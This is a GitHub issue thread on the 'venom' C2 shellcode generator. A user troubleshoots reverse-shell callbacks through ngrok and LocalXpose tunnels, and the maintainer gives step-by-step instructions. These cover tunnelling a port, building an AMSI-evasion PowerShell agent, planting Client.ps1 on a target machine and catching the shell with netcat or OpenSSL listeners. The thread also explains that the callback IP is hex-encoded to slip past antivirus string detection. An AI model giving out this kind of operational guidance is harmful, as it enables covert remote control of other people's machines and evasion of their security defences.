problem in getting a connection on public network / WAN

r00t-3xp10it / venom

venom - C2 shellcode generator/compiler/handler

1.78k stars 597 forks source link

problem in getting a connection on public network / WAN #76

Open ricko2991 opened 4 years ago

ricko2991 commented 4 years ago

Hi, i want to access a connection from a different network by sending a payload containing my ip address. And send using the http port forwarding service, namely LocalXpose, but I don't seem to get a return connection from the target. Localhost

port forwading service

Listener

I tried the method above and it might not work. So I have to use tcp. So the payload use localxpose port and i as listener use my local port. Okay, This is my problem, when I use the tcp port provided by localxpose. it will also be used as a listener. so how can I switch that listener back to my localhost. The listener should use my local port but i can't change it.

r00t-3xp10it commented 4 years ago

see this: https://www.youtube.com/watch?v=fPF-slJLOlk&t=77s

ricko2991 commented 4 years ago

Hi, @r00t-3xp10it I have no problem in 1-7 payload categorie payloads when port forwading. But I have a problem with Amsi evasion, I can't do port forwarding with it

ricko2991 commented 4 years ago

have you tried it and succeeded? Somehow i failed... can you show host and the port you are using on the payload and also the listeners you used.

Hi, i try this: 2.tcp.ngrok.io:14598 --> localhost:1111

Payload options(ngrok) LPORT : 14598 LHOST : 13.59.15.185 or LHOST : 2.tcp.ngrok.io

Listen 1º nc -lvp 0.0.0.0 14598 ==> invalid local port 0.0.0.0 2º nc -nlvp 1111 ==> Not connected / nc -lvp 1111 ==> not connected 3º nc -nlvp 14598 ==> not connected 4º nc -s 127.0.0.1 -nlvp 14598 ==> not connected 5º nc -s 127.0.0.1 -nlvp 1111 ==> not connected

r00t-3xp10it commented 4 years ago

ok lets try this step by step ... Check this video for referencie: https://www.youtube.com/watch?v=8YswLITdE7g

1º - ./ngrok tcp 14598 2º - chose venom - amsi evasion agent nº 2 3º - LHOST == 2.tcp.ngrok.io (ngrok) 4º - LPORT == 14598 (ngrok) 5º - goto /var/www/html and port the Agent (Client.ps1) to target machine (manually) 6º - start venom listenner (OpenSSL) 7º - On target machine execute the Client.ps1

Final notes:

Amsi evasion agents require the Apache2 webserver to deliver files to target host ... so venom users need to port forward the Client.ps1 connection AND the apache2 webserver .. "But In this exercise we are NOT going to port forward the apache2, just to test if the client connects back to the listenner".. OpenSSL agents require openssl s_server -quiet -key key.pem -cert cert.pem -port 14598 <-openssl listenner not Netcat

ricko2991 commented 4 years ago

Thank you, now it's working. And also for example I am using agent no.3 on amsi and it is covered by "hex obfuscation" how do I decode a script covered by hex?

r00t-3xp10it commented 4 years ago

the only thing encoded (hex) in agent nº 3 its the ip address ... This is one attempt to hidde the ip address 'string' from amsi string detection inside Client.ps1 ... hex

how to decode hex

ricko2991 commented 4 years ago

Thank you 👍